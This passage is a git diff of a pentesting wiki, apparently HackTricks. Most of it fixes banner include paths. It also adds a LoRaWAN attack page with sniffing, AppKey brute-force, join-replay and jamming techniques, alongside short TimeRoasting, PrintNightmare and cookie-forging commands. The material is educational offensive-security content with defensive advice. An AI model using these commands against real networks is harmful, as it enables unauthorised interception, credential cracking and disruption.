unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**. @@ -76,4 +76,4 @@ Always fingerprint the exact framework version via the `X-Frame-Options` error p * Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. * OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index ecf2c580d..62d5c4097 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,6 +1,6 @@ # Laravel -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ### Laravel SQLInjection @@ -91,7 +91,7 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1. * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) -{{#include ../../banners/hacktricks-training.md}} + ## Laravel Tricks @@ -283,4 +283,3 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/nodejs-express.md b/src/network-services-pentesting/pentesting-web/nodejs-express.md index cd0d1c66b..f51ed42c6 100644 --- a/src/network-services-pentesting/pentesting-web/nodejs-express.md +++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md @@ -1,6 +1,6 @@ # NodeJS Express -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Cookie Signature @@ -39,5 +39,4 @@ cookie-monster -e -f new_cookie.json -k secret ``` -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md index 164be26bf..1c02371ee 100644 --- a/src/network-services-pentesting/pentesting-web/spring-actuators.md +++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md @@ -63,9 +63,9 @@ Host: target.com Connection: close ``` - {{#include ../../banners/hacktricks-training.md}} -{{#include /src/banners/hacktricks-training.md}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/dapps-DecentralizedApplications.md b/src/pentesting-web/dapps-DecentralizedApplications.md index 6d2e3871b..21626d3b2 100644 --- a/src/pentesting-web/dapps-DecentralizedApplications.md +++ b/src/pentesting-web/dapps-DecentralizedApplications.md @@ -1,6 +1,6 @@ # DApps - Decentralized Applications -{{#include ../../banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ## What is a DApp? @@ -79,6 +79,5 @@ In the scenario **`Mishandling of Asset Classes`**, is explained that the backen - [https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications](https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications) -{{#include ../../banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md index 4ba103e46..8862b2f93 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md @@ -47,13 +47,13 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\ - [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) + + +``` + +``` + + + + {{#include ../../banners/hacktricks-training.md}} - -``` - -``` - - - - -{{#include /src/banners/hacktricks-training.md}} diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md index 32ef75d5d..e0f95bfdf 100644 --- a/src/pentesting-web/idor.md +++ b/src/pentesting-web/idor.md @@ -80,10 +80,10 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces * **OWASP ZAP**: Auth Matrix, Forced Browse. * **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting). -{{#include ../banners/hacktricks-training.md}} + ## References * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index d690529aa..e82d29aba 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,6 @@ # XSS (Cross Site Scripting) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Methodology diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md index 96ff08913..ab7a47a7c 100644 --- a/src/todo/hardware-hacking/fault_injection_attacks.md +++ b/src/todo/hardware-hacking/fault_injection_attacks.md @@ -1,6 +1,6 @@ # Fault Injection Attacks -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits. @@ -8,4 +8,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md index 6ac9fa741..b312f8ed1 100644 --- a/src/todo/hardware-hacking/side_channel_analysis.md +++ b/src/todo/hardware-hacking/side_channel_analysis.md @@ -1,6 +1,6 @@ # Side Channel Analysis Attacks -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example: @@ -10,4 +10,4 @@ These attacks are very popular in case of leaking data such as private keys or f -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md index a09ea2c1f..ad736fc4c 100644 --- a/src/todo/industrial-control-systems-hacking/README.md +++ b/src/todo/industrial-control-systems-hacking/README.md @@ -1,6 +1,6 @@ # Industrial Control Systems Hacking -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## About this Section @@ -18,5 +18,4 @@ These techniques can also be used to protect against attacks and blue teaming fo -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md index 9f044e573..24bea668e 100644 --- a/src/todo/industrial-control-systems-hacking/modbus.md +++ b/src/todo/industrial-control-systems-hacking/modbus.md @@ -1,6 +1,6 @@ # The Modbus Protocol -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Introduction to Modbus Protocol @@ -34,6 +34,5 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md index 2added321..51e5db7a8 100644 --- a/src/todo/investment-terms.md +++ b/src/todo/investment-terms.md @@ -1,6 +1,6 @@ # Investment Terms -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ## Spot @@ -71,4 +71,4 @@ However, the buyer will be paying some fee to the seller for opening the option -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/todo/radio-hacking/README.md b/src/todo/radio-hacking/README.md index 42011e5a4..3322ace68 100644 --- a/src/todo/radio-hacking/README.md +++ b/src/todo/radio-hacking/README.md @@ -1,6 +1,5 @@ # Radio Hacking -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md index f9cfc1334..09dc92b7e 100644 --- a/src/todo/radio-hacking/fissure-the-rf-framework.md +++ b/src/todo/radio-hacking/fissure-the-rf-framework.md @@ -1,6 +1,6 @@ # FISSURE - The RF Framework -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} **Frequency Independent SDR-based Signal Understanding and Reverse Engineering** @@ -187,5 +187,4 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md index 5dd51512d..e33e95c62 100644 --- a/src/todo/radio-hacking/low-power-wide-area-network.md +++ b/src/todo/radio-hacking/low-power-wide-area-network.md @@ -4,16 +4,96 @@ ## Introduction -**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide area network technologies designed for **long-range communications** at a low bit rate.\ +**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide-area network technologies designed for **long-range communications** at a low bit rate. They can reach more than **six miles** and their **batteries** can last up to **20 years**. -Long Range (**LoRa**) it’s popular in multiple countries and has an open source specification called **LoRaWAN**. +Long Range (**LoRa**) is currently the most deployed LPWAN physical layer and its open MAC-layer specification is **LoRaWAN**. -### LPWAN, LoRa, and LoRaWAN +--- -[https://github.com/IOActive/laf](https://github.com/IOActive/laf) +## LPWAN, LoRa, and LoRaWAN +* LoRa – Chirp Spread Spectrum (CSS) physical layer developed by Semtech (proprietary but documented). +* LoRaWAN – Open MAC/Network layer maintained by the LoRa-Alliance. Versions 1.0.x and 1.1 are common in the field. +* Typical architecture: *end-device → gateway (packet-forwarder) → network-server → application-server*. + +> The **security model** relies on two AES-128 root keys (AppKey/NwkKey) that derive session keys during the *join* procedure (OTAA) or are hard-coded (ABP). If any key leaks the attacker gains full read/write capability over the corresponding traffic. + +--- + +## Attack surface summary + +| Layer | Weakness | Practical impact | +|-------|----------|------------------| +| PHY | Reactive / selective jamming | 100 % packet loss demonstrated with single SDR and <1 W output | +| MAC | Join-Accept & data-frame replay (nonce reuse, ABP counter rollover) | Device spoofing, message injection, DoS | +| Network-Server | Insecure packet-forwarder, weak MQTT/UDP filters, outdated gateway firmware | RCE on gateways → pivot into OT/IT network | +| Application | Hard-coded or predictable AppKeys | Brute-force/decrypt traffic, impersonate sensors | + +--- + +## Recent vulnerabilities (2023-2025) + +* **CVE-2024-29862** – *ChirpStack gateway-bridge & mqtt-forwarder* accepted TCP packets that bypassed stateful firewall rules on Kerlink gateways, allowing remote management interface exposure. Fixed in 4.0.11 / 4.2.1 respectively . +* **Dragino LG01/LG308 series** – Multiple 2022-2024 CVEs (e.g. 2022-45227 directory traversal, 2022-45228 CSRF) still observed unpatched in 2025; enable unauthenticated firmware dump or config overwrite on thousands of public gateways . +* Semtech *packet-forwarder UDP* overflow (unreleased advisory, patched 2023-10): crafted uplink larger than 255 B triggered stack-smash ‑> RCE on SX130x reference gateways (found by Black Hat EU 2023 “LoRa Exploitation Reloaded”). + +--- + +## Practical attack techniques + +### 1. Sniff & Decrypt traffic + +```bash +# Capture all channels around 868.3 MHz with an SDR (USRP B205) +python3 lorattack/sniffer.py \ + --freq 868.3e6 --bw 125e3 --rate 1e6 --sf 7 --session smartcity + +# Bruteforce AppKey from captured OTAA join-request/accept pairs +python3 lorapwn/bruteforce_join.py --pcap smartcity.pcap --wordlist top1m.txt +``` + +### 2. OTAA join-replay (DevNonce reuse) + +1. Capture a legitimate **JoinRequest**. +2. Immediately retransmit it (or increment RSSI) before the original device transmits again. +3. The network-server allocates a new DevAddr & session keys while the target device continues with the old session → attacker owns vacant session and can inject forged uplinks. + +### 3. Adaptive Data-Rate (ADR) downgrading + +Force SF12/125 kHz to increase airtime → exhaust duty-cycle of gateway (denial-of-service) while keeping battery impact low on attacker (just send network-level MAC commands). + +### 4. Reactive jamming + +*HackRF One* running GNU Radio flowgraph triggers a wide-band chirp whenever preamble detected – blocks all spreading factors with ≤200 mW TX; full outage measured at 2 km range . + +--- + +## Offensive tooling (2025) + +| Tool | Purpose | Notes | +|------|---------|-------| +| **LoRaWAN Auditing Framework (LAF)** | Craft/parse/attack LoRaWAN frames, DB-backed analyzers, brute-forcer | Docker image, supports Semtech UDP input | +| **LoRaPWN** | Trend Micro Python utility to brute OTAA, generate downlinks, decrypt payloads | Demo released 2023, SDR-agnostic | +| **LoRAttack** | Multi-channel sniffer + replay with USRP; exports PCAP/LoRaTap | Good Wireshark integration | +| **gr-lora / gr-lorawan** | GNU Radio OOT blocks for baseband TX/RX | Foundation for custom attacks | + +--- + +## Defensive recommendations (pentester checklist) + +1. Prefer **OTAA** devices with truly random DevNonce; monitor duplicates. +2. Enforce **LoRaWAN 1.1**: 32-bit frame counters, distinct FNwkSIntKey / SNwkSIntKey. +3. Store frame-counter in non-volatile memory (**ABP**) or migrate to OTAA. +4. Deploy **secure-element** (ATECC608A/SX1262-TRX-SE) to protect root keys against firmware extraction. +5. Disable remote UDP packet-forwarder ports (1700/1701) or restrict with WireGuard/VPN. +6. Keep gateways updated; Kerlink/Dragino provide 2024-patched images. +7. Implement **traffic anomaly detection** (e.g., LAF analyzer) – flag counter resets, duplicate joins, sudden ADR changes. + + + +## References + +* LoRaWAN Auditing Framework (LAF) – https://github.com/IOActive/laf +* Trend Micro LoRaPWN overview – https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md index 5f78a9154..4340a663a 100644 --- a/src/todo/rust-basics.md +++ b/src/todo/rust-basics.md @@ -1,6 +1,6 @@ # Rust Basics -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ### Generic Types @@ -320,5 +320,4 @@ fn main() { ``` -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}} diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md index 751db9fd9..63b8eb6d4 100644 --- a/src/todo/test-llms.md +++ b/src/todo/test-llms.md @@ -1,6 +1,6 @@ # Test LLMs -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ## Run & train models locally @@ -52,5 +52,4 @@ It offers several sections like: * **API Access:** Simple APIs for running models the enable developers to deploy and scale models effortlessly within their own applications. -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/TimeRoasting.md b/src/windows-hardening/active-directory-methodology/TimeRoasting.md index d92f0064b..8d142baeb 100644 --- a/src/windows-hardening/active-directory-methodology/TimeRoasting.md +++ b/src/windows-hardening/active-directory-methodology/TimeRoasting.md @@ -1,6 +1,6 @@ # TimeRoasting -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP. In this mechanism, clients can directly use any computer account's Relative Identifier (RID), and the domain controller will use the computer account's NTLM hash (generated by MD4) as the key to generate the **Message Authentication Code (MAC)** of the response packet. @@ -39,4 +39,4 @@ sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt hashcat -m 31300 ntp-hashes.txt ``` -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/printnightmare.md b/src/windows-hardening/active-directory-methodology/printnightmare.md index 212f04ab1..52d308aae 100644 --- a/src/windows-hardening/active-directory-methodology/printnightmare.md +++ b/src/windows-hardening/active-directory-methodology/printnightmare.md @@ -95,7 +95,7 @@ Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll **More reading (external):** Check the 2024 walk-through blog post – [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/) -{{#include ../../banners/hacktricks-training.md}} + ## References @@ -103,4 +103,4 @@ Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll * Oliver Lyak – *SpoolFool: CVE-2022-21999* -{{#include /banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md index 94e4cf8a3..16f733a37 100644 --- a/src/windows-hardening/cobalt-strike.md +++ b/src/windows-hardening/cobalt-strike.md @@ -1,6 +1,6 @@ # Cobalt Strike -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ### Listeners @@ -371,5 +371,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}}